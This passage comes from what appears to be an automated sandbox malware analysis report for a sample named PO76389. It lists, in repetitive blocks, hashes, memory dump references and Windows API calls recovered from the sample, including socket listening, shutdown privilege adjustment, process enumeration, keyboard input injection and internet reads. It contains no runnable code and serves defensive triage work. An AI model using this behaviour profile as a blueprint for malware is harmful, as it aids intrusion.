                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                    • API String ID: 0-1546025612
                                                    • Opcode ID: 19d2161441f279a07efe63801ad8068cd0ac511e881fc23c809ed5224750a3ae
                                                    • Instruction ID: 868063e6f45a507c8fa548dfebc5855dda844606c3c661c388e026c4caff59f1
                                                    • Opcode Fuzzy Hash: 19d2161441f279a07efe63801ad8068cd0ac511e881fc23c809ed5224750a3ae
                                                    • Instruction Fuzzy Hash: C7927D71E0021ACBDF24DF58C8407EEBBB1BB54314F1485AAD916AB380D7789D81DF65
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 4643a1dbfdc4c5659afd3a58a2f47ee7db386296daf68bbc70e27a65707b7102
                                                    • Instruction ID: b6c14757cf1e5cc0df801acc53e2ed6058c64c4425d292f4e00c963bdd702697
                                                    • Opcode Fuzzy Hash: 4643a1dbfdc4c5659afd3a58a2f47ee7db386296daf68bbc70e27a65707b7102
                                                    • Instruction Fuzzy Hash: 1A129E70A00619EBDF04DFA5D981AEEB7F9FF48304F20456EE406E7290EB399911CB65
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                      • Part of subcall function 004CB736: GetCursorPos.USER32(000000FF), ref: 004CB749
                                                      • Part of subcall function 004CB736: ScreenToClient.USER32(00000000,000000FF), ref: 004CB766
                                                      • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000001), ref: 004CB78B
                                                      • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000002), ref: 004CB799
                                                    • ReleaseCapture.USER32 ref: 0051EB1A
                                                    • SetWindowTextW.USER32(?,00000000), ref: 0051EBC2
                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0051EBD5
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0051ECAE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                    • API String ID: 973565025-2107944366
                                                    • Opcode ID: b28cb7cb893ef359d6c32febc0cd4c3634abbe347e93db8cd3fbcbf8ceabfb9e
                                                    • Instruction ID: ea5f7689e7f70341610a9a98ba5a90c045e73b94c545303159e06a1716119b27
                                                    • Opcode Fuzzy Hash: b28cb7cb893ef359d6c32febc0cd4c3634abbe347e93db8cd3fbcbf8ceabfb9e
                                                    • Instruction Fuzzy Hash: 44517A31104304AFE700EF24DC96FAA7BF5BB88708F10492DF955962A2DB749948EB66
                                                    APIs
                                                      • Part of subcall function 004EBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004EBF0F
                                                      • Part of subcall function 004EBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004EBF3C
                                                      • Part of subcall function 004EBEC3: GetLastError.KERNEL32 ref: 004EBF49
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 004F830C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                    • String ID: $@$SeShutdownPrivilege
                                                    • API String ID: 2234035333-194228
                                                    • Opcode ID: 053c9abc53651b30c741f4465336062fa736c0603f48d0741548bda98af05d35
                                                    • Instruction ID: 85444b7e366aa48d161b2e21392ca873de1298c1ba092ac57bf2a68a371d615f
                                                    • Opcode Fuzzy Hash: 053c9abc53651b30c741f4465336062fa736c0603f48d0741548bda98af05d35
                                                    • Instruction Fuzzy Hash: F101FC71B40319ABE76816788C4BBBB3668DB00F84F14042EFF03DA2E1DE595C0181AC
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00509235
                                                    • WSAGetLastError.WS2_32(00000000), ref: 00509244
                                                    • bind.WS2_32(00000000,?,00000010), ref: 00509260
                                                    • listen.WS2_32(00000000,00000005), ref: 0050926F
                                                    • WSAGetLastError.WS2_32(00000000), ref: 00509289
                                                    • closesocket.WS2_32(00000000), ref: 0050929D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                    • String ID:
                                                    • API String ID: 1279440585-0
                                                    • Opcode ID: 521bd4ff449022acc91b69b2de2f52eb39187c56b87af7dc23f66ef3692ab240
                                                    • Instruction ID: 86b93d47a7baf546090b223f8279b67eeb3b1a07e1cd57a0f76b80743cfd630a
                                                    • Opcode Fuzzy Hash: 521bd4ff449022acc91b69b2de2f52eb39187c56b87af7dc23f66ef3692ab240
                                                    • Instruction Fuzzy Hash: AF218D39600201AFCB00EF64D885B6EBBB9FF44724F108119F956AB3D2CB74AD45DB61
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004F6F7D
                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004F6F8D
                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 004F6FAC
                                                    • __wsplitpath.LIBCMT ref: 004F6FD0
                                                    • _wcscat.LIBCMT ref: 004F6FE3
                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004F7022
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                    • String ID:
                                                    • API String ID: 1605983538-0
                                                    • Opcode ID: c64a528642a3391f07e2632c6c38ea7fa3bcab6f240cab8651d8768201f4f091
                                                    • Instruction ID: 15368c93121fd84bacccbb3a9f4fb28405a045fda4044a57a1857885731b4f74
                                                    • Opcode Fuzzy Hash: c64a528642a3391f07e2632c6c38ea7fa3bcab6f240cab8651d8768201f4f091
                                                    • Instruction Fuzzy Hash: 352156B1904219AFDB10ABA0DC88BEEB7BDAF54304F1004DAF605D3241EB799F84DB65
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: hNV$tMV
                                                    • API String ID: 4104443479-474198503
                                                    • Opcode ID: 33e4aadd45b22ceaeac9aafc7ee5a332bf919d28a2f9fad87864400b3ef80ba4
                                                    • Instruction ID: 754537382ba19b40e01ec1e93d765c2634e2aff81c285b378ee288cd72a75451
                                                    • Opcode Fuzzy Hash: 33e4aadd45b22ceaeac9aafc7ee5a332bf919d28a2f9fad87864400b3ef80ba4
                                                    • Instruction Fuzzy Hash: 2CA22875D01219CFCB24CF58C8806EDBBB1FF49314F2581AAE859AB390D7789D82DB64
                                                    APIs
                                                      • Part of subcall function 004D010A: std::exception::exception.LIBCMT ref: 004D013E
                                                      • Part of subcall function 004D010A: __CxxThrowException@8.LIBCMT ref: 004D0153
                                                    • _memmove.LIBCMT ref: 00523020
                                                    • _memmove.LIBCMT ref: 00523135
                                                    • _memmove.LIBCMT ref: 005231DC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1300846289-0
                                                    • Opcode ID: 332aa97e83c006c9d5e1b4954d9572f28bb8815d008de03900b417a0db236e9a
                                                    • Instruction ID: 1d543e0fc2cdbb8fb21e76e73df1e9d47b47aebfc330fc21ed50ced0a21e009e
                                                    • Opcode Fuzzy Hash: 332aa97e83c006c9d5e1b4954d9572f28bb8815d008de03900b417a0db236e9a
                                                    • Instruction Fuzzy Hash: 6F02A370A00115DBCF04DF69D981AAEBBB5FF45300F14806EE806DB395EB39DA15CBA5
                                                    APIs
                                                      • Part of subcall function 0050ACD3: inet_addr.WS2_32(00000000), ref: 0050ACF5
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0050973D
                                                    • WSAGetLastError.WS2_32(00000000,00000000), ref: 00509760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 4170576061-0
                                                    • Opcode ID: 79726f1c1b31a0fdee280e49ec844a6b7b83a52d44ac555334b1899ef8285483
                                                    • Instruction ID: 5c1f638eef09198cfba0a76c099d2a5ad2956d5dd2e6d7b7b3808682a87eabfe
                                                    • Opcode Fuzzy Hash: 79726f1c1b31a0fdee280e49ec844a6b7b83a52d44ac555334b1899ef8285483
                                                    • Instruction Fuzzy Hash: C641E474600200AFDB14AF25CC82F6E77EDEF44728F14845EF955AB392DA789D018BA5
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004FF37A
                                                    • _wcscmp.LIBCMT ref: 004FF3AA
                                                    • _wcscmp.LIBCMT ref: 004FF3BF
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 004FF3D0
                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 004FF3FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 2387731787-0
                                                    • Opcode ID: 398f2d8427a8997ec6ae36f0adf7550247321cbe520faffdbf46139603d1a41f
                                                    • Instruction ID: 73736d6ee00e0892736191b05a4b6c5b610c15b3b2f85be58e4cd8c02cc0d663
                                                    • Opcode Fuzzy Hash: 398f2d8427a8997ec6ae36f0adf7550247321cbe520faffdbf46139603d1a41f
                                                    • Instruction Fuzzy Hash: 4D41C0356043029FC704DF29C490EAAB3E4FF49328F10416EEA59CB3A1DB79A945CB99
                                                    APIs
                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 004F439C
                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 004F43B8
                                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 004F4425
                                                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 004F4483
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: b4cd720b2cda2a19e6ced3d239d412dfc45693a964dc6a1869c0b5c883111a13
                                                    • Instruction ID: 8cc536ff4ae194f009c094bc73438e6dab20f72657fdc2bc5d81beeaa714c231
                                                    • Opcode Fuzzy Hash: b4cd720b2cda2a19e6ced3d239d412dfc45693a964dc6a1869c0b5c883111a13
                                                    • Instruction Fuzzy Hash: 6241F5B0A0025CAAEF209B65D8057FF7BB5AB95315F04015BF681A23C1CB7C8A859779
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • GetCursorPos.USER32(?), ref: 0051EFE2
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0052F3C3,?,?,?,?,?), ref: 0051EFF7
                                                    • GetCursorPos.USER32(?), ref: 0051F041
                                                    • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0052F3C3,?,?,?), ref: 0051F077
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                    • String ID:
                                                    • API String ID: 1423138444-0
                                                    • Opcode ID: 6b7a965d225fc38835ba19c0596be1114600b5e2bd2f6586ac01924b0c84c374
                                                    • Instruction ID: ab341cb6fd1872f98525b9d2f6ff3195458ddbdf62c33d147c96072760b9558a
                                                    • Opcode Fuzzy Hash: 6b7a965d225fc38835ba19c0596be1114600b5e2bd2f6586ac01924b0c84c374
                                                    • Instruction Fuzzy Hash: 02212335500018EFDB258F59D898EEA7FB5FB09724F044069F90A872A2C3309D91EBA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: G-K
                                                    • API String ID: 0-1269858464
                                                    • Opcode ID: 5bc9e5dc41fcf065211475fe992cdf23a80a20480b91c1248f19eb29484ee0b0
                                                    • Instruction ID: fc3c2c15fe6cf54e4426d22c26510a0e846df279cb9caf151d35a971045180a9
                                                    • Opcode Fuzzy Hash: 5bc9e5dc41fcf065211475fe992cdf23a80a20480b91c1248f19eb29484ee0b0
                                                    • Instruction Fuzzy Hash: A322AC70E052158FDB14DF58C490BFAB7F0FF59304F1480AAE8469B391E779A885CBA9
                                                    APIs
                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 004F221E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: lstrlen
                                                    • String ID: ($|
                                                    • API String ID: 1659193697-1631851259
                                                    • Opcode ID: 3f4f3318245aa13e9d0030713122d56d321a2d2c9a27bef0414175310eb32f96
                                                    • Instruction ID: dd69782e583814b6020d686bf9f3b02deb6b5bf2843785173c9e0afbfe840d83
                                                    • Opcode Fuzzy Hash: 3f4f3318245aa13e9d0030713122d56d321a2d2c9a27bef0414175310eb32f96
                                                    • Instruction Fuzzy Hash: BA323675A007059FC728CF69C580A6AB7F0FF48320B11C46EE59ADB3A1D7B4E941CB48
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 004CAE5E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: DialogLongNtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 2065330234-0
                                                    • Opcode ID: 5da798c2f3655d4516191221d96241736ee016fc3e895108d936225c19327aaa
                                                    • Instruction ID: 85105f0f15bc4f7bc609199ac69594c614b05064e83fe97fc201a31f5d048ce6
                                                    • Opcode Fuzzy Hash: 5da798c2f3655d4516191221d96241736ee016fc3e895108d936225c19327aaa
                                                    • Instruction Fuzzy Hash: 32A10C6810411DBADB64AA296C89FBF3D6DFF96348B14453FF402D21D1C51D8C61A3BB
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00504A1E,00000000), ref: 005055FD
                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00505629
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
